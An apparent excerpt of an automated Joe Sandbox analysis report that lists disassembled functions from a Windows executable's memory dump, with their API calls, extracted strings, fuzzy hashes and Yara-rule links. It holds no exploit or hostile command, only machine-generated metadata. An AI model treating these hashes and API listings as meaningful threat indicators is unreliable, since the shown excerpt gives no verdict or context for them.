                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                                                                            • API String ID: 176396367-1901692981
                                                                                                            • Opcode ID: 4d46d4fd19ab8d8112129052a71b82fa6de0cbf2f3985ba1c2d210d0cb5d8bfd
                                                                                                            • Instruction ID: 46aa1555892507f9373a259e82ed7062b465e7ff373320cb565a8e3d9b5aa79f
                                                                                                            • Opcode Fuzzy Hash: 4d46d4fd19ab8d8112129052a71b82fa6de0cbf2f3985ba1c2d210d0cb5d8bfd
                                                                                                            • Instruction Fuzzy Hash: DEE19832A00616EBCB15DF78C451AEEBBB4FF54750F588119E457B7240DB309E89ABB0
                                                                                                            Function 00D700C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D700C6
                                                                                                              • Part of subcall function 00D700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E2070C,00000FA0,0A0CC637,?,?,?,?,00D923B3,000000FF), ref: 00D7011C
                                                                                                              • Part of subcall function 00D700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D923B3,000000FF), ref: 00D70127
                                                                                                              • Part of subcall function 00D700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D923B3,000000FF), ref: 00D70138
                                                                                                              • Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D7014E
                                                                                                              • Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D7015C
                                                                                                              • Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D7016A
                                                                                                              • Part of subcall function 00D700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D70195
                                                                                                              • Part of subcall function 00D700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D701A0
                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00D700E7
                                                                                                              • Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9
                                                                                                            Strings
                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D70122
                                                                                                            • SleepConditionVariableCS, xrefs: 00D70154
                                                                                                            • kernel32.dll, xrefs: 00D70133
                                                                                                            • InitializeConditionVariable, xrefs: 00D70148
                                                                                                            • WakeAllConditionVariable, xrefs: 00D70162
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                            • API String ID: 66158676-1714406822
                                                                                                            • Opcode ID: 55510a31d039838e884e538f6c7facf585739b782db2350a78eeca334a2c86f4
                                                                                                            • Instruction ID: 7929222bd00150e70c92e849d600821b0215df349e5ad0bcd1a31f2cd4ae117c
                                                                                                            • Opcode Fuzzy Hash: 55510a31d039838e884e538f6c7facf585739b782db2350a78eeca334a2c86f4
                                                                                                            • Instruction Fuzzy Hash: 8C210B32A44750EFD7217B65AC45B6A3F94DB04B61F04813AFC09E67D2EBB09C048AB0
                                                                                                            Function 00DC44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00DECC08), ref: 00DC4527
                                                                                                            • _wcslen.LIBCMT ref: 00DC453B
                                                                                                            • _wcslen.LIBCMT ref: 00DC4599
                                                                                                            • _wcslen.LIBCMT ref: 00DC45F4
                                                                                                            • _wcslen.LIBCMT ref: 00DC463F
                                                                                                            • _wcslen.LIBCMT ref: 00DC46A7
                                                                                                              • Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD
                                                                                                            • GetDriveTypeW.KERNEL32(?,00E16BF0,00000061), ref: 00DC4743
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                            • Opcode ID: ce4709f1f118868e2b33418a414f0dfea2476836da0c93a31a31e4bc281230e4
                                                                                                            • Instruction ID: da0429a49520e76d5c8e7868fe44cda21db80f059cc566a7a04437517562d2b3
                                                                                                            • Opcode Fuzzy Hash: ce4709f1f118868e2b33418a414f0dfea2476836da0c93a31a31e4bc281230e4
                                                                                                            • Instruction Fuzzy Hash: 9CB1D2316083029FC710DF28C8A1EAAB7E5EFA5760F54491DF896C7295E730D845CBB2
                                                                                                            Function 00DE911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00DE9147
                                                                                                              • Part of subcall function 00DE7674: ClientToScreen.USER32(?,?), ref: 00DE769A
                                                                                                              • Part of subcall function 00DE7674: GetWindowRect.USER32(?,?), ref: 00DE7710
                                                                                                              • Part of subcall function 00DE7674: PtInRect.USER32(?,?,00DE8B89), ref: 00DE7720
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DE91B0
                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DE91BB
                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DE91DE
                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DE9225
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DE923E
                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DE9255
                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DE9277
                                                                                                            • DragFinish.SHELL32(?), ref: 00DE927E
                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DE9371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                                                                                            • API String ID: 221274066-136824727
                                                                                                            • Opcode ID: d9d6be5f3b7174bfbc5cf450759a4f8e755ea2fc05264ec54205788d91adf2c4
                                                                                                            • Instruction ID: 87cf0b4c546ed22e644a2fcce2c9fcc858a7d8c85a309ef3aed44d2c44c13d83
                                                                                                            • Opcode Fuzzy Hash: d9d6be5f3b7174bfbc5cf450759a4f8e755ea2fc05264ec54205788d91adf2c4
                                                                                                            • Instruction Fuzzy Hash: BE618A71108341AFC701EF65DC95DAFBBE8EF88750F40091DF995962A1DB309A49CB72
                                                                                                            Function 00DDAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DDB198
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB1B0
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB1D4
                                                                                                            • _wcslen.LIBCMT ref: 00DDB200
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB214
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB236
                                                                                                            • _wcslen.LIBCMT ref: 00DDB332
                                                                                                              • Part of subcall function 00DC05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DC05C6
                                                                                                            • _wcslen.LIBCMT ref: 00DDB34B
                                                                                                            • _wcslen.LIBCMT ref: 00DDB366
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DDB3B6
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00DDB407
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DDB439
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDB44A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDB45C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDB46E
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DDB4E3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2178637699-0
                                                                                                            • Opcode ID: fe7d6c8966a9a02b62c6f0f96c5e08934b76ec47c47359ecea3a9909ccafe0f9
                                                                                                            • Instruction ID: 91b6a5b14b429dea4d82e3b1ff5a32039fa009c4d5f84460b072fff744b1738f
                                                                                                            • Opcode Fuzzy Hash: fe7d6c8966a9a02b62c6f0f96c5e08934b76ec47c47359ecea3a9909ccafe0f9
                                                                                                            • Instruction Fuzzy Hash: A0F14931504340DFCB14EF24C891A6ABBE5EF85328F19855EF8959B2A2DB31EC45CB72
                                                                                                            Function 00D5326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetMenuItemCount.USER32(00E21990), ref: 00D92F8D
                                                                                                            • GetMenuItemCount.USER32(00E21990), ref: 00D9303D
                                                                                                            • GetCursorPos.USER32(?), ref: 00D93081
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00D9308A
                                                                                                            • TrackPopupMenuEx.USER32(00E21990,00000000,?,00000000,00000000,00000000), ref: 00D9309D
                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D930A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 36266755-4108050209
                                                                                                            • Opcode ID: be6e7e0b8367129455735ae4fd6b0e4957078997a84587a160b6c6804fe3756f
                                                                                                            • Instruction ID: 823d3672551926ac06fe1de43ed249cfe2c7a97f7f32d16d5ba08935648e4f1c
                                                                                                            • Opcode Fuzzy Hash: be6e7e0b8367129455735ae4fd6b0e4957078997a84587a160b6c6804fe3756f
                                                                                                            • Instruction Fuzzy Hash: 0A712930640345BEEF219F65CC89FAABF64FF04364F244216F919AA1E0C7B1A914CB70
                                                                                                            Function 00DE6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?), ref: 00DE6DEB
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DE6E5F
                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DE6E81
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE6E94
                                                                                                            • DestroyWindow.USER32(?), ref: 00DE6EB5
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D50000,00000000), ref: 00DE6EE4
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE6EFD
                                                                                                            • GetDesktopWindow.USER32 ref: 00DE6F16
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DE6F1D
                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DE6F35
                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DE6F4D
                                                                                                              • Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                            • String ID: 0$tooltips_class32
                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                            • Opcode ID: ce16521dfa571dc270e7399ada2fe4c94c771e96c64f178cd704307955a1ee58
                                                                                                            • Instruction ID: a51d571bcd32876490dd46cc464a2f3ba21369cfb4a1c183962adc7bc46efcaf
                                                                                                            • Opcode Fuzzy Hash: ce16521dfa571dc270e7399ada2fe4c94c771e96c64f178cd704307955a1ee58
                                                                                                            • Instruction Fuzzy Hash: 1D718B70104380AFDB20EF19D884BAABBE9FF99740F08441DF98997261D770ED4ACB21
                                                                                                            Function 00DCC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DCC4B0
                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DCC4C3
                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DCC4D7
                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DCC4F0
                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DCC533
                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DCC549
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DCC554
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DCC584
                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DCC5DC
                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DCC5F0
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00DCC5FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                            • Opcode ID: 8b876e05ff9f43af64397dcfc27d84c9fa4bea7bf5a3cfa2e095a5f260fbda8f
                                                                                                            • Instruction ID: 7425ceca8b581c42503e51fda602150eea9ee7e9d1cef2b64b27d1d7c90fa1e2
                                                                                                            • Opcode Fuzzy Hash: 8b876e05ff9f43af64397dcfc27d84c9fa4bea7bf5a3cfa2e095a5f260fbda8f
                                                                                                            • Instruction Fuzzy Hash: 14515BB152074ABFDB219F64C988FAA7BBCEB08344F04941DFA49D7650EB30E9459B70
                                                                                                            Function 00DE856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00DE8592
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00DE85A2
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00DE85AD
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DE85BA
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DE85C8
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DE85D7
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DE85E0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DE85E7
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DE85F8
                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DEFC38,?), ref: 00DE8611
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DE8621
                                                                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 00DE8641
                                                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DE8671
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DE8699
                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DE86AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3840717409-0
                                                                                                            • Opcode ID: 5df70a48eecf5c447e56890df5e4db685063b82499a2f98e66926dbc3432039d
                                                                                                            • Instruction ID: ff3395a19624a6e7959db125f1f349e8486db0acd5ef704937fa906ec71bcdd3
                                                                                                            • Opcode Fuzzy Hash: 5df70a48eecf5c447e56890df5e4db685063b82499a2f98e66926dbc3432039d
                                                                                                            • Instruction Fuzzy Hash: 8941F975610384AFDB11EFA5DC88EAE7BB8EF89715F144058F919EB260DB309902DB70
                                                                                                            Function 00DC14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00DC1502
                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00DC150B
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DC1517
                                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DC15FB
                                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 00DC1657
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DC1708
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00DC178C
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DC17D8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DC17E7
                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00DC1823
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                            • API String ID: 1234038744-3931177956
                                                                                                            • Opcode ID: 052633b9573b34610d469f2dabb3b220ae853b1b1a27571a65c88497c2290c48
                                                                                                            • Instruction ID: 2fd0479b72f3e591a4fc4a8730789a80a4a676ab1ccaf9d05f191733469df3c5
                                                                                                            • Opcode Fuzzy Hash: 052633b9573b34610d469f2dabb3b220ae853b1b1a27571a65c88497c2290c48
                                                                                                            • Instruction Fuzzy Hash: 1AD11375A10222DBCB00AF65D885F79B7B5FF46700F54849AE846AB282DB30EC45DB71
                                                                                                            Function 00DDB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDB6F4
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDB772
                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00DDB80A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDB87E
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDB89C
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DDB8F2
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DDB904
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DDB922
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00DDB983
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDB994
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
